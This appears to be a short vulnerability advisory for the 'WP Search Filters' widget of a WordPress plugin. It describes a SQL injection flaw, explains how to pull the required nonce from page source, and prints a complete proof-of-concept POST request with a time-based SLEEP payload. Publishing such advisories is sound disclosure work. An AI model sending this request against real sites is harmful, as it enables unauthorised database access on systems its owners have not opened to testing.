The "WP Search Filters" widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection
The request requires a nonce (created with wp_create_nonce("theplus-searchfilter”)) which can be retrieved from a page where the widget is present, by looking at the source for "security". POST /wp-admin/admin-ajax.php HTTP/2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 253 action=theplus_filter_post&nonce=b74e4cfaa0&option[0][filtertype]=search_list&option[0][post_type]=product&option[0][seapara][0][type]=taxonomy&option[0][seapara][0][field]=rating&option[0][seapara][0][value]=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))SQLi)
Nicolas Vidal from TEHTRIS
Nicolas Vidal from TEHTRIS
Yes
2021-12-13 (about 1 years ago)
2021-12-13 (about 1 years ago)
2022-04-11 (about 9 months ago)